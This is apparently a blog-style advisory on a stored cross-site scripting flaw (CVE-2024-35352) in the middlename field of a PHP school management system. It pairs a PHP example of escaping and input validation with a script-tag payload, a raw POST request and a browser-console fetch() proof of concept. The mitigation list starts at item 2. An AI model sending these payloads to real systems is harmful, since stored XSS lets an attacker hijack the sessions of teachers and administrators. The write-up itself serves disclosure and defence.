A new vulnerability, CVE-2024-35352, has been discovered in the Diño Physics School Assistant version 2.3. This post will explain—using simple language—what the vulnerability is, why it matters, and how it can be exploited, along with code examples. If you use this software in a school, pay close attention!

What is Diño Physics School Assistant?

Diño Physics School Assistant is a free PHP/MySQL-based school management system, often used in schools for managing students, teachers, schedules, and grades.

Affected File

/classes/Users.php?f=save

Affected Parameter

middlename

Version

2.3 (and possibly earlier versions)

Impact

A user entering special JavaScript code via the middlename field can make the site run malicious scripts in other users’ browsers. This can be used to steal sessions, redirect users, or worse.

How Does the Vulnerability Work?

The PHP script responsible for saving user information (Users.php?f=save) does not sanitize inputs for the "middlename" field.

So, if someone inputs JavaScript code as their middlename, and a page later displays this without escaping, the code will execute in the browser of anyone viewing that page.
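As an added example (not the project's code), here is the render-side defect just described beside its fix: the unsafe function interpolates the stored middlename straight into markup, the hardened one HTML-escapes it at the point of output. The `isPlausibleName` allow-list is an assumption chosen for this example, added as defence in depth on the save side; output escaping remains the primary control.

```php
<?php
// Added example, not code from Diño Physics School Assistant.
// Constructed sample value in the shape of the payload discussed in the post.
$storedMiddlename = "<script>alert('Hacked!')</script>";

// Vulnerable pattern: the stored value lands in the page unescaped, so the
// browser parses the <script> element and runs it for whoever views the page.
function renderMiddlenameUnsafe(string $middlename): string
{
    return "<span>Middlename: $middlename</span>";
}

// Hardened pattern: escape for the HTML text context at output time.
// ENT_QUOTES also escapes both quote characters, so the same call is safe
// inside a quoted attribute; ENT_SUBSTITUTE keeps invalid UTF-8 from turning
// the whole string into '' and silently blanking the field.
function renderMiddlenameSafe(string $middlename): string
{
    $escaped = htmlspecialchars(
        $middlename,
        ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5,
        'UTF-8'
    );
    return "<span>Middlename: $escaped</span>";
}

// Assumed allow-list for the save side (Users.php?f=save): letters in any
// script, combining marks, space, period, hyphen and apostrophe, at most 50
// characters. Angle brackets never pass, so the stored value stays clean even
// if some other template forgets to escape.
function isPlausibleName(string $value): bool
{
    return preg_match('/^[\p{L}\p{M} .\'-]{1,50}$/u', $value) === 1;
}

// Render the same stored value both ways; only the second is inert text.
echo renderMiddlenameUnsafe($storedMiddlename), PHP_EOL;
echo renderMiddlenameSafe($storedMiddlename), PHP_EOL;

// The allow-list accepts a real name with an apostrophe and rejects the payload.
var_dump(isPlausibleName("O'Brien"));
var_dump(isPlausibleName($storedMiddlename));
```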

Here’s a simple script that could be inserted as a middlename:

<script>alert('Hacked!')</script>

You can use Burp Suite, browser dev tools, or curl to send a request like this:

POST /classes/Users.php?f=save HTTP/1.1
Host: targetschool.example.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=YOURSESSIONID

id=123&middlename=%3Cscript%3Ealert('Hacked!')%3C%2Fscript%3E&firstname=John&lastname=Doe

*Here, %3Cscript%3Ealert('Hacked!')%3C%2Fscript%3E is the URL-encoded form for <script>alert('Hacked!')</script>.*

Later, when an admin or teacher views the user list or profile, the script executes in their browser:

<span>Middlename: <script>alert('Hacked!')</script></span>


Proof-of-Concept JavaScript Code

Here’s a JavaScript snippet you can run in your browser console to send an exploit (make sure you have permission!):

fetch('/classes/Users.php?f=save', {
  method: 'POST',
  credentials: 'include',
  headers: {
    'Content-Type': 'application/x-www-form-urlencoded'
  },
  body: 'id=123&middlename=%3Cscript%3Ealert("Gotcha!")%3C%2Fscript%3E'
})
.then(res => console.log('Payload sent!'));

References

- NVD Listing for CVE-2024-35352 *(Details as available)*
- Original Project on SourceForge
- OWASP XSS Overview

2. Use Content Security Policy (CSP): Prevent execution of inline scripts.

3. Update ASAP: Check the project page for patches.

Conclusion

CVE-2024-35352 is a simple but dangerous XSS vulnerability in Diño Physics School Assistant’s user saving code. If you use this software, patch it and sanitize all user inputs. Don't let someone sneak JavaScript into your school system—protect your community!

Stay safe and secure—always validate and escape your inputs.

*If you want more technical breakdowns, follow OWASP XSS guidelines.*

Timeline

Published on: 05/30/2024 17:15:33 UTC
Last modified on: 07/03/2024 02:01:35 UTC